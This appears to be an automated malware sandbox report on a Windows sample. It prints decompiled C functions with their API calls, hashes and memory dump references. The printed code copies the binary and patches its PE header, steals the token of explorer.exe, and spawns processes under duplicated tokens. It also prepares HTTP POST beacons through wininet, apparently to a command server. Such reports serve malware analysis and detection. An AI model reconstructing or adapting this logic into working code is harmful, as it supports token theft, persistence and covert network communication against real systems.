  • Instruction ID: 41ff6f16ac9ee2ff72b6e11d6e7bca6878d0baa93780668c194bfac74e4ec8cf
  • Opcode Fuzzy Hash: 3ED0228D802F0BD0CC5B5047AF2E3320106AB40BDAE1C89703290414816F1FE067EF8D
  • Instruction Fuzzy Hash: 41ff6f16ac9ee2ff72b6e11d6e7bca6878d0baa93780668c194bfac74e4ec8cf
C-Code - Quality: 100%
			E001D1ABC(void* _a4, intOrPtr _a8) {
				void* _t6;
				void* _t8;
				void* _t14;

				_t14 = _a4;
				if(_t14 != 0) {
					if(_a8 != 0) {
						E001D1E27(_t14, 0x7fffffff);
					}
					E001D1DD4(_t14);
					_t8 =  *(_t14 + 0x3ba4);
					if(_t8 != 0) {
						if(WaitForSingleObject(_t8, 0x1388) == 0x102) {
							TerminateThread( *(_t14 + 0x3ba4), 0);
						}
						CloseHandle( *(_t14 + 0x3ba4));
					}
					return LocalFree(_t14);
				}
				return _t6;
			}






0x001d1abd
0x001d1ac3
0x001d1aca
0x001d1ad2
0x001d1ad2
0x001d1ad8
0x001d1add
0x001d1ae5
0x001d1af8
0x001d1b02
0x001d1b02
0x001d1b0e
0x001d1b0e
0x00000000
0x001d1b15
0x001d1b1c

APIs
  • WaitForSingleObject.KERNEL32(?,00001388), ref: 001D1AED
  • TerminateThread.KERNEL32(?,00000000), ref: 001D1B02
  • CloseHandle.KERNEL32(?), ref: 001D1B0E
  • LocalFree.KERNEL32(?,?), ref: 001D1B15
    • Part of subcall function 001D1E27: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 001D1E4D
    • Part of subcall function 001D1E27: TranslateMessage.USER32(?), ref: 001D1E74
    • Part of subcall function 001D1E27: DispatchMessageA.USER32(?), ref: 001D1E7E
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

General

Root Process Name:P8Wo4avJbj.exe
Process MD5:6EAA1FF5F33DF3169C209F98CC5012D0
Total matches:88
Initial Analysis Report:Open
Initial sample Analysis ID:57815
Initial sample SHA 256:27DD9DE09E22EFA2EF12E9E2F462FA9DA83684BDB4EC900DD86439C5758107D9
Initial sample name:dRoYbhso1.exe

Similar Executed Functions

Similarity
  • Total matches: 6
  • API ID: lstrcpy$CloseHandleCopyFileCreateFileGetModuleFileNameSetFilePointerWriteFilelstrcmpilstrlen
  • String ID: dll$exe
  • API String ID: 1827060118-2048111982
  • Opcode ID: c3885fe13371a926e81591ffe00ebdc536067f9240e3e9512f9da992c1313499
  • Instruction ID: 57b1cbd0d537261b9f72dfb42b8f065b65fb383f86c9acaf781157f8dac982d0
  • Opcode Fuzzy Hash: 52F0E98E0D8E83C5D466A3477C95BF311417742D9AD4D97B079D97298F6F12A208EF04
  • Instruction Fuzzy Hash: 57b1cbd0d537261b9f72dfb42b8f065b65fb383f86c9acaf781157f8dac982d0
C-Code - Quality: 100%
			E00402B08(long _a4, void _a8) {
				CHAR* _v8;
				char _v268;
				long _t20;
				int _t23;
				int _t24;
				struct HINSTANCE__* _t27;
				void _t30;
				CHAR* _t36;
				long _t42;
				CHAR* _t44;
				void* _t46;

				_t20 = GetModuleFileNameA( *0x405044,  &_v268, 0x104);
				if(_t20 == 0) {
					return _t20;
				}
				_v8 = "dll";
				if(_a8 != 0) {
					_v8 = "exe";
				}
				_t44 = _a4;
				lstrcpyA(_t44,  &_v268);
				_t23 = lstrlenA(_t44);
				_t9 = _t44 - 3; // -3
				_t36 = _t23 + _t9;
				_t24 = lstrcmpiA(_t36, _v8); // executed
				if(_t24 != 0) {
					lstrcpyA(_t36, _v8);
					_t24 = CopyFileA( &_v268, _t44, 0); // executed
					if(_t24 != 0) {
						_t24 = CreateFileA(_t44, 0xc0000000, 3, 0, 3, 0, 0); // executed
						_t46 = _t24;
						if(_t46 != 0xffffffff) {
							_t27 =  *0x405044; // 0x400000
							_t12 = _t27 + 0x3c; // 0xa8
							_t42 =  *_t12 + _t27 - _t27 + 0x16;
							_a4 = _t42;
							if(_a8 != 0) {
								_t30 = 0;
							} else {
								_t30 = 0x2000;
							}
							_a8 = _t30;
							SetFilePointer(_t46, _t42, 0, 0); // executed
							WriteFile(_t46,  &_a8, 2,  &_a4, 0); // executed
							_t24 = CloseHandle(_t46);
						}
					}
				}
				return _t24;
			}














0x00402b23
0x00402b2b
0x00402c02
0x00402c02
0x00402b35
0x00402b3c
0x00402b3e
0x00402b3e
0x00402b4e
0x00402b59
0x00402b5c
0x00402b65
0x00402b65
0x00402b6a
0x00402b72
0x00402b7c
0x00402b89
0x00402b91
0x00402ba0
0x00402ba6
0x00402bab
0x00402bad
0x00402bb2
0x00402bbb
0x00402bc3
0x00402bca
0x00402bd3
0x00402bcc
0x00402bcc
0x00402bcc
0x00402bdc
0x00402bdf
0x00402bf1
0x00402bf8
0x00402bf8
0x00402bab
0x00402b91
0x00000000

APIs
  • GetModuleFileNameA.KERNEL32(?,00000104), ref: 00402B23
  • lstrcpyA.KERNEL32(?,?,00000044,00000000,76E1EA18), ref: 00402B59
  • lstrlenA.KERNEL32(?), ref: 00402B5C
  • lstrcmpi.KERNEL32(-00000003,004011C8), ref: 00402B6A
  • lstrcpyA.KERNEL32(-00000003,004011C8), ref: 00402B7C
  • CopyFileA.KERNEL32(?,?,00000000), ref: 00402B89
  • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00402BA0
  • SetFilePointer.KERNELBASE(00000000,00000092,00000000,00000000), ref: 00402BDF
  • WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 00402BF1
  • CloseHandle.KERNEL32(00000000), ref: 00402BF8
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
  • Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
  • Associated: 00000001.00000002.260196655.00407000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CloseHandle$WaitForSingleObject$CreateEventCreateThreadExitProcessGetStdHandleGetVersionSetStdHandle
  • String ID:
  • API String ID: 4158509741-0
  • Opcode ID: 2ad7749c4b6b29532a42bdd3babab8e75ff4bd89d39d064bb05a7080b22e26a8
  • Instruction ID: 1f66a28011c897b0d121599fcf6742e47d01aa91f08c6217b59ea673e7e77bb8
  • Opcode Fuzzy Hash: 1FF02D8822485981C46BAD007CF4FB125448B1765FD98B7143F6D7816F3785B1457F9A
  • Instruction Fuzzy Hash: 1f66a28011c897b0d121599fcf6742e47d01aa91f08c6217b59ea673e7e77bb8
C-Code - Quality: 96%
			E00403358() {
				long _v4;
				void* _v8;
				long _t8;
				void* _t10;
				void* _t11;
				void* _t17;
				intOrPtr _t23;
				intOrPtr _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t36;
				intOrPtr _t42;

				_t8 = GetVersion();
				_t42 =  *0x4050b0; // 0x0
				 *0x405070 = _t8;
				if(_t42 == 0 && _t8 < 0) {
					 *0x40506c =  *0x40506c | 0xffffffff;
				}
				_push(_t31);
				_v8 = GetStdHandle(0xfffffff4);
				_t10 = E00402A43(); // executed
				_t36 = _t10;
				if(_t36 == 0) {
					L10:
					_t11 =  *0x40506c; // 0x0
					__eflags = _t11;
					if(_t11 != 0) {
						__eflags = _t11 - 2;
						if(_t11 == 2) {
							L22:
							if(_v8 != 0) {
								CloseHandle(_v8);
							}
							ExitProcess(0);
						}
						__eflags = _t36;
						if(_t36 != 0) {
							L16:
							 *0x4050c8 = CreateEventA(0, 0, 0, 0);
							L17:
							_t33 = CreateThread(0, 0, E00402C05, 0, 0,  &_v4);
							__eflags = _t33;
							if(_t33 != 0) {
								_t17 =  *0x4050c8; // 0x0
								__eflags = _t17;
								if(_t17 != 0) {
									WaitForSingleObject(_t17, 0xffffffff);
									CloseHandle( *0x4050c8);
									 *0x4050c8 = 0;
								}
								WaitForSingleObject(_t33, 0xffffffff);
								CloseHandle(_t33);
							}
							L21:
							E00402FA0(_t30, 0);
							goto L22;
						}
						__eflags = _t11 - 0xffffffff;
						if(_t11 != 0xffffffff) {
							goto L17;
						}
						goto L16;
					}
					__eflags = _t36;
					if(_t36 != 0) {
						goto L16;
					}
					E00401626();
					goto L22;
				}
				_t23 =  *0x4050b4; // 0x1d6000
				 *0x405048 = 0;
				_t46 =  *((intOrPtr*)(_t23 + 0x28));
				if( *((intOrPtr*)(_t23 + 0x28)) != 0) {
					 *0x40506c = 1;
					SetStdHandle(0xfffffff6, _v8);
					goto L10;
				}
				 *0x40506c = 2;
				_t34 = E00402DE5(0, _t31, _t36, _t46);
				_t26 =  *0x4050b4; // 0x1d6000
				 *(_t26 + 0x28) = 1;
				_t27 = E00403094(0, _t30, _t34, _t36, _t46, _t34);
				asm("sbb esi, esi");
				_t36 = 1 +  ~_t27;
				if(_t34 != 0) {
					CloseHandle(_t34);
				}
				if(_t36 != 0) {
					goto L10;
				} else {
					goto L21;
				}
			}


















0x0040335c
0x00403364
0x0040336a
0x0040336f
0x00403375
0x00403375
0x0040337d
0x00403386
0x0040338a
0x00403395
0x00403399
0x004033fb
0x004033fb
0x00403400
0x00403402
0x0040340f
0x00403412
0x00403476
0x0040347c
0x00403482
0x00403482
0x00403485
0x00403485
0x00403414
0x00403416
0x0040341d
0x00403427
0x0040342c
0x00403440
0x00403442
0x00403444
0x00403446
0x0040344b
0x00403453
0x00403458
0x00403460
0x00403462
0x00403462
0x0040346b
0x0040346e
0x0040346e
0x00403470
0x00403471
0x00000000
0x00403471
0x00403418
0x0040341b
0x00000000
0x00000000
0x00000000
0x0040341b
0x00403404
0x00403406
0x00000000
0x00000000
0x00403408
0x00000000
0x00403408
0x0040339b
0x004033a0
0x004033a6
0x004033a9
0x004033e9
0x004033f5
0x00000000
0x004033f5
0x004033ab
0x004033ba
0x004033bc
0x004033c2
0x004033c9
0x004033d2
0x004033d4
0x004033d7
0x004033da
0x004033da
0x004033de
0x00000000
0x004033e0
0x00000000
0x004033e0

APIs
  • GetVersion.KERNEL32 ref: 0040335C
  • GetStdHandle.KERNEL32(000000F4), ref: 00403380
    • Part of subcall function 00402A43: LoadLibraryA.KERNEL32(?), ref: 00402A6F
    • Part of subcall function 00402A43: GetCurrentProcessId.KERNEL32 ref: 00402AA1
  • SetStdHandle.KERNEL32(000000F6,?), ref: 004033F5
    • Part of subcall function 00402DE5: LoadLibraryA.KERNEL32(ntdll.dll), ref: 00402E03
    • Part of subcall function 00402DE5: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E22
    • Part of subcall function 00402DE5: GetProcAddress.KERNEL32(00000000,_wcsicmp,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E35
    • Part of subcall function 00402DE5: LocalAlloc.KERNEL32(00000040,00010000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E4A
    • Part of subcall function 00402DE5: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E6D
    • Part of subcall function 00402DE5: OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,?,?,00401448,00000028), ref: 00402EAC
    • Part of subcall function 00402DE5: OpenProcessToken.ADVAPI32(00000000,000200FF,?,?,?,?,?,?,?,00401448,00000028), ref: 00402EC5
    • Part of subcall function 00402DE5: CloseHandle.KERNEL32(00000000), ref: 00402ECC
    • Part of subcall function 00402DE5: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402EF5
    • Part of subcall function 00402DE5: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402F04
    • Part of subcall function 00403094: GetCurrentProcessId.KERNEL32(00401410,00000184,00403308,00000000,00000001,00000113,?,?,00402421), ref: 004030B4
    • Part of subcall function 00403094: OpenProcess.KERNEL32(001F0FFF,00000001,00000000,?,?,00402421), ref: 004030C1
    • Part of subcall function 00403094: DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,00000000,?,00000104), ref: 00403151
    • Part of subcall function 00403094: SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004), ref: 00403169
    • Part of subcall function 00403094: CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 00403197
    • Part of subcall function 00403094: CloseHandle.KERNEL32(00000000), ref: 004031A8
    • Part of subcall function 00403094: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,?,00000000,00000000,?,?), ref: 004031C8
    • Part of subcall function 00403094: TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 0040322D
    • Part of subcall function 00403094: CloseHandle.KERNEL32(?), ref: 00403236
    • Part of subcall function 00403094: CloseHandle.KERNEL32(?), ref: 00403247
    • Part of subcall function 00403094: CreateThread.KERNEL32(00000000,00000000,Function_00002965,?,00000000,?), ref: 0040326D
    • Part of subcall function 00403094: SetStdHandle.KERNEL32(000000F6,00000000), ref: 0040327B
  • CloseHandle.KERNEL32(00000000), ref: 004033DA
  • ExitProcess.KERNEL32 ref: 00403485
    • Part of subcall function 00401626: StartServiceCtrlDispatcherA.ADVAPI32(00405034,0040340D), ref: 0040162B
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403421
  • CreateThread.KERNEL32(00000000,00000000,Function_00002C05,00000000,00000000,?), ref: 0040343A
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403458
  • CloseHandle.KERNEL32 ref: 00403460
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040346B
  • CloseHandle.KERNEL32(00000000), ref: 0040346E
  • CloseHandle.KERNEL32(?), ref: 00403482
Memory Dump Source
  • Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
  • Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
  • Associated: 00000001.00000002.260196655.00407000.00000002.sdmp

Similar Non-Executed Functions

Similarity
  • Total matches: 6
  • API ID: GetProcAddressLocalFree$CloseHandleFreeLibraryLoadLibraryLocalAllocOpenProcessOpenProcessToken
  • String ID: NtQuerySystemInformation$_wcsicmp$[FILE]$[FILE]
  • API String ID: 871439847-2760969069
  • Opcode ID: 79303f3461f55357ea3caebb2c463ba2263ea78e754b615967e539c6771ee5b5
  • Instruction ID: d143e7d7f0a7e528b80bb3ef837344cc21e5cd4fbee9c201c5a4592c151db2c3
  • Opcode Fuzzy Hash: 48F04686904A97F1E623B9C8196D36164553FA17C8E0D8631B21038912B7AF322A7F80
  • Instruction Fuzzy Hash: d143e7d7f0a7e528b80bb3ef837344cc21e5cd4fbee9c201c5a4592c151db2c3
C-Code - Quality: 96%
			E001D2DE5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t37;
				void* _t38;
				intOrPtr _t40;
				void _t41;
				int _t42;
				struct HINSTANCE__* _t49;
				void* _t50;
				long _t54;
				void* _t58;
				void* _t59;
				void* _t60;

				_push(0x28);
				_push(0x1d1448);
				E001D1637(__ebx, __edi, __esi);
				 *(_t60 - 0x1c) =  *(_t60 - 0x1c) & 0x00000000;
				_t54 = 0x10000;
				 *(_t60 - 0x24) =  *(_t60 - 0x24) & 0x00000000;
				_t49 = LoadLibraryA("ntdll.dll");
				 *(_t60 - 0x20) = _t49;
				if(_t49 == 0) {
					L17:
					if( *(_t60 - 0x20) != 0) {
						FreeLibrary( *(_t60 - 0x20));
					}
					if( *(_t60 - 0x1c) != 0) {
						LocalFree( *(_t60 - 0x1c));
					}
					return E001D173E( *(_t60 - 0x24));
				}
				_t36 = GetProcAddress(_t49, "NtQuerySystemInformation");
				 *(_t60 - 0x28) = _t36;
				if(_t36 == 0) {
					goto L17;
				}
				_t37 = GetProcAddress(_t49, "_wcsicmp");
				 *(_t60 - 0x2c) = _t37;
				if(_t37 == 0) {
					goto L17;
				}
				while(1) {
					_t38 = LocalAlloc(0x40, _t54);
					 *(_t60 - 0x1c) = _t38;
					if(_t38 == 0) {
						goto L17;
					}
					_t50 =  *(_t60 - 0x28)(5, _t38, _t54, 0);
					if(_t50 != 0xc0000004) {
						if(_t50 < 0) {
							goto L17;
						}
						L8:
						if(_t50 == 0xc0000004) {
							continue;
						}
						_t58 =  *(_t60 - 0x1c);
						 *(_t60 - 4) =  *(_t60 - 4) & 0x00000000;
						while(1) {
							_t40 =  *((intOrPtr*)(_t58 + 0x3c));
							 *((intOrPtr*)(_t60 - 0x30)) = _t40;
							if(_t40 == 0) {
								goto L14;
							}
							_t42 =  *(_t60 - 0x2c)(_t40, L"explorer.exe");
							if(_t42 != 0) {
								goto L14;
							}
							_t59 = OpenProcess(0x410, _t42,  *(_t58 + 0x44));
							 *(_t60 - 0x34) = _t59;
							if(_t59 != 0) {
								OpenProcessToken(_t59, 0x200ff, _t60 - 0x24);
								CloseHandle(_t59);
							}
							L16:
							 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
							goto L17;
							L14:
							_t41 =  *_t58;
							if(_t41 == 0) {
								goto L16;
							}
							_t58 = _t58 + _t41;
							 *(_t60 - 0x38) = _t58;
						}
					}
					LocalFree( *(_t60 - 0x1c));
					 *(_t60 - 0x1c) =  *(_t60 - 0x1c) & 0x00000000;
					_t54 = _t54 + _t54;
					goto L8;
				}
				goto L17;
			}















0x001d2de5
0x001d2de7
0x001d2dec
0x001d2df1
0x001d2df5
0x001d2dfa
0x001d2e09
0x001d2e0b
0x001d2e10
0x001d2eec
0x001d2ef0
0x001d2ef5
0x001d2ef5
0x001d2eff
0x001d2f04
0x001d2f04
0x001d2f12
0x001d2f12
0x001d2e22
0x001d2e24
0x001d2e29
0x00000000
0x00000000
0x001d2e35
0x001d2e37
0x001d2e3c
0x00000000
0x00000000
0x001d2e47
0x001d2e4a
0x001d2e50
0x001d2e55
0x00000000
0x00000000
0x001d2e64
0x001d2e68
0x001d2e7d
0x00000000
0x00000000
0x001d2e7f
0x001d2e81
0x00000000
0x00000000
0x001d2e83
0x001d2e86
0x001d2e8a
0x001d2e8a
0x001d2e8d
0x001d2e92
0x00000000
0x00000000
0x001d2e9a
0x001d2ea1
0x00000000
0x00000000
0x001d2eb2
0x001d2eb4
0x001d2eb9
0x001d2ec5
0x001d2ecc
0x001d2ecc
0x001d2ee8
0x001d2ee8
0x00000000
0x001d2ed4
0x001d2ed4
0x001d2ed8
0x00000000
0x00000000
0x001d2eda
0x001d2edc
0x001d2edc
0x001d2e8a
0x001d2e6d
0x001d2e73
0x001d2e77
0x00000000
0x001d2e77
0x00000000

APIs
  • LoadLibraryA.KERNEL32(ntdll.dll), ref: 001D2E03
  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E22
  • GetProcAddress.KERNEL32(00000000,_wcsicmp,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E35
  • LocalAlloc.KERNEL32(00000040,00010000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E4A
  • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E6D
  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2EAC
  • OpenProcessToken.ADVAPI32(00000000,000200FF,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2EC5
  • CloseHandle.KERNEL32(00000000), ref: 001D2ECC
  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2EF5
  • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2F04
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 5
  • API ID: FreeLibraryGetProcAddressLoadLibraryinet_ntoawsprintf
  • String ID: N$%s: 0$Mozilla/4.0 (compatible; MSIE 6.0;)$POST$TagId$[FILE]
  • API String ID: 3761191649-3458657377
  • Opcode ID: 2aee25d4d97340da8d57a5187acebaa494bf19f8195fcf1f0a5fcee18dc65b62
  • Instruction ID: 5c5cc2a2a5d0c80c85ef90c9e54d4eb75811ab3963221f16da9f65b959107efc
  • Opcode Fuzzy Hash: 3CF04C85081F07F5FC33A941245D77DE780BF95AC2DCCF9155622D6A235A4D32189741
  • Instruction Fuzzy Hash: 5c5cc2a2a5d0c80c85ef90c9e54d4eb75811ab3963221f16da9f65b959107efc
C-Code - Quality: 94%
			E001D2CC7(_Unknown_base(*)()** _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8;
				char _v40;
				signed int _t30;
				_Unknown_base(*)()* _t32;
				signed int _t34;
				signed int _t35;
				intOrPtr* _t36;
				signed int _t43;
				void* _t51;
				signed int* _t54;

				_v8 = 0x4e20;
				_t30 = LoadLibraryA("wininet.dll");
				_t54 = _a4;
				_t54[0xd] = _t30;
				if(_t30 != 0) {
					_a4 =  &(_t54[3]);
					_t51 = 0;
					while(1) {
						_t6 = _t51 + 0x1d500c; // 0x1d12c8
						_t32 = GetProcAddress(_t54[0xd],  *_t6);
						 *_a4 = _t32;
						if(_t32 == 0) {
							break;
						}
						_a4 =  &(_a4[1]);
						_t51 = _t51 + 4;
						if(_t51 < 0x28) {
							continue;
						}
						_t35 = _t54[3]("Mozilla/4.0 (compatible; MSIE 6.0;)", 0, 0, 0, 0);
						 *_t54 = _t35;
						if(_t35 != 0) {
							if(_a16 != 0) {
								_t36 = _a12;
								_push( *_t36);
								L001D3826();
							} else {
								_t36 = _a8;
							}
							_t35 = _t54[4]( *_t54, _t36, 0x50, 0x1d1369, 0x1d1369, 3, 0, 0);
							_t54[1] = _t35;
							if(_t35 == 0) {
								goto L6;
							} else {
								_t35 = _t54[9](_t35, "POST", 0x1d1369, 0, 0, 0, 0x84400100, 0);
								_t54[2] = _t35;
								if(_t35 == 0) {
									goto L6;
								}
								_t54[5](_t35, 2,  &_v8, 4);
								_t54[5](_t54[2], 5,  &_v8, 4);
								wsprintfA( &_v40, "%s: 0\r\n", "TagId");
								_t43 = _t54[7](_t54[2],  &_v40, 0xffffffff, 0, 0);
								asm("sbb eax, eax");
								_t34 = ( ~_t43 & 0x00000002) - 1;
								L14:
								return _t34;
							}
						}
						L6:
						_t34 = _t35 | 0xffffffff;
						goto L14;
					}
					FreeLibrary(_t54[0xd]);
					_t54[0xd] = 0;
					_t34 = 0;
					goto L14;
				}
				return _t30 | 0xffffffff;
			}













0x001d2cd4
0x001d2cdb
0x001d2ce1
0x001d2ce8
0x001d2ceb
0x001d2cf9
0x001d2cfc
0x001d2cfe
0x001d2cfe
0x001d2d07
0x001d2d12
0x001d2d14
0x00000000
0x00000000
0x001d2d16
0x001d2d1a
0x001d2d20
0x00000000
0x00000000
0x001d2d2b
0x001d2d30
0x001d2d32
0x001d2d52
0x001d2d59
0x001d2d5c
0x001d2d5e
0x001d2d54
0x001d2d54
0x001d2d54
0x001d2d73
0x001d2d78
0x001d2d7b
0x00000000
0x001d2d7d
0x001d2d8d
0x001d2d92
0x001d2d95
0x00000000
0x00000000
0x001d2da0
0x001d2dae
0x001d2dbf
0x001d2dd3
0x001d2dd8
0x001d2ddd
0x001d2dde
0x00000000
0x001d2dde
0x001d2d7b
0x001d2d34
0x001d2d34
0x00000000
0x001d2d34
0x001d2d3f
0x001d2d45
0x001d2d48
0x00000000
0x001d2d48
0x00000000

APIs
  • LoadLibraryA.KERNEL32(wininet.dll), ref: 001D2CDB
  • GetProcAddress.KERNEL32(001D12C8,001D12C8), ref: 001D2D07
  • FreeLibrary.KERNEL32(?), ref: 001D2D3F
  • inet_ntoa.WSOCK32(?), ref: 001D2D5E
  • wsprintfA.USER32 ref: 001D2DBF
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CloseHandle$CreateProcessCreateProcessAsUserCreateThreadDuplicateTokenExGetCurrentProcessIdOpenProcessSetStdHandleSetTokenInformationTerminateProcess
  • String ID:
  • API String ID: 3127335161-0
  • Opcode ID: d2529c531e04d4ae067d5c82a3609593e1c0a8b50e4b57957b408f9e477c39a1
  • Instruction ID: 52d5a6e819d562572e733741dd7379ddee707760d2556d7286c866b6ac08418f
  • Opcode Fuzzy Hash: D411598B4588D5B3C8C3B9583C0AB24D4A1EF4A9E5CAD6325B0B9596C44B49390ADF89
  • Instruction Fuzzy Hash: 52d5a6e819d562572e733741dd7379ddee707760d2556d7286c866b6ac08418f
C-Code - Quality: 96%
			E001D3094(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t101;
				intOrPtr _t103;
				void* _t109;
				void* _t112;
				struct _STARTUPINFOA _t116;
				void** _t117;
				void* _t120;

				_t112 = __ecx;
				_push(0x184);
				_push(0x1d1410);
				E001D1637(__ebx, __edi, __esi);
				 *(_t120 - 0x1c) = 0;
				 *((intOrPtr*)(_t120 - 0x38)) = 0;
				 *((intOrPtr*)(_t120 - 0x3c)) = 1;
				 *(_t120 - 4) = 0;
				_t109 = OpenProcess(0x1f0fff, 1, GetCurrentProcessId());
				 *((intOrPtr*)(_t120 - 0x40)) = _t109;
				if(_t109 == 0) {
					goto L28;
				} else {
					_t116 = 0x44;
					E001D384D(_t120 - 0x90, 0, 1);
					 *(_t120 - 0x90) = _t116;
					 *((short*)(_t120 - 0x60)) = 0;
					 *((intOrPtr*)(_t120 - 0x64)) = 0x181;
					 *((intOrPtr*)(_t120 - 0x50)) = _t109;
					while(1) {
						 *(_t120 - 0x24) = 0;
						if( *((intOrPtr*)(_t120 - 0x3c)) == 0 || E001D3734(_t112, _t120 - 0x194, 0x104) == 0) {
							E001D2B08(_t120 - 0x194, 1);
						} else {
							 *(_t120 - 0x24) = 4;
						}
						if( *(_t120 + 8) == 0) {
							goto L12;
						}
						_t117 = _t120 + 8;
						 *(_t120 - 0x48) = _t117;
						 *(_t120 - 0x20) = 0;
						if(DuplicateTokenEx( *(_t120 + 8), 0x2000000, 0, 0, 1, _t120 - 0x20) != 0) {
							 *(_t120 - 0x44) = 0;
							if(SetTokenInformation( *(_t120 - 0x20), 0xc, _t120 - 0x44, 4) != 0) {
								_t117 = _t120 - 0x20;
								 *(_t120 - 0x48) = _t117;
							}
						}
						 *(_t120 - 0x1c) = CreateProcessAsUserA( *_t117, 0, _t120 - 0x194, 0, 0, 1,  *(_t120 - 0x24), 0, 0, _t120 - 0x90, _t120 - 0x34);
						if( *(_t120 - 0x20) != 0) {
							CloseHandle( *(_t120 - 0x20));
						}
						L13:
						if(( *(_t120 - 0x24) & 0x00000004) == 0) {
							L23:
							__eflags =  *(_t120 - 0x1c);
							if( *(_t120 - 0x1c) == 0) {
								L26:
								SetStdHandle(0xfffffff6, 0);
								E001D2965(0,  *(_t120 - 0x34));
								 *(_t120 - 0x34) = 0;
								L28:
								_t66 = _t120 - 4;
								 *_t66 =  *(_t120 - 4) | 0xffffffff;
								__eflags =  *_t66;
								E001D32B0(0);
								return E001D173E( *(_t120 - 0x1c));
							}
							L24:
							__eflags =  *0x1d506c; // 0x0
							if(__eflags != 0) {
								goto L26;
							}
							 *((intOrPtr*)(_t120 - 0x38)) = CreateThread(0, 0, E001D2965,  *(_t120 - 0x34), 0, _t120 - 0x4c);
							goto L28;
						}
						if( *(_t120 - 0x1c) == 0) {
							L18:
							if( *((intOrPtr*)(_t120 - 0x3c)) == 0) {
								goto L23;
							}
							 *((intOrPtr*)(_t120 - 0x3c)) = 0;
							if( *(_t120 - 0x34) != 0) {
								TerminateProcess( *(_t120 - 0x34), 0);
								CloseHandle( *(_t120 - 0x34));
								 *(_t120 - 0x34) = 0;
							}
							if( *(_t120 - 0x30) != 0) {
								CloseHandle( *(_t120 - 0x30));
								 *(_t120 - 0x30) = 0;
							}
							continue;
						}
						E001D2B08(_t120 - 0x194, 0);
						_t101 = E001D3683(_t112, _t120 - 0x194,  *(_t120 - 0x34), 0);
						 *(_t120 - 0x1c) = _t101;
						if(_t101 != 0) {
							_t103 =  *0x1d50b4; // 0x0
							E001D3020(_t112,  *(_t120 - 0x34),  *((intOrPtr*)(_t103 + 0x34)), 0, 0, _t120 - 0x1c, 0);
						}
						if( *(_t120 - 0x1c) != 0) {
							goto L24;
						} else {
							goto L18;
						}
						L12:
						 *(_t120 - 0x1c) = CreateProcessA(0, _t120 - 0x194, 0, 0, 1,  *(_t120 - 0x24), 0, 0, _t120 - 0x90, _t120 - 0x34);
						goto L13;
					}
				}
			}










0x001d3094
0x001d3094
0x001d3099
0x001d309e
0x001d30a5
0x001d30a8
0x001d30ae
0x001d30b1
0x001d30c7
0x001d30c9
0x001d30ce
0x00000000
0x001d30d4
0x001d30d6
0x001d30e0
0x001d30e5
0x001d30eb
0x001d30ef
0x001d30f6
0x001d30ff
0x001d30ff
0x001d3105
0x001d312e
0x001d311c
0x001d311c
0x001d311c
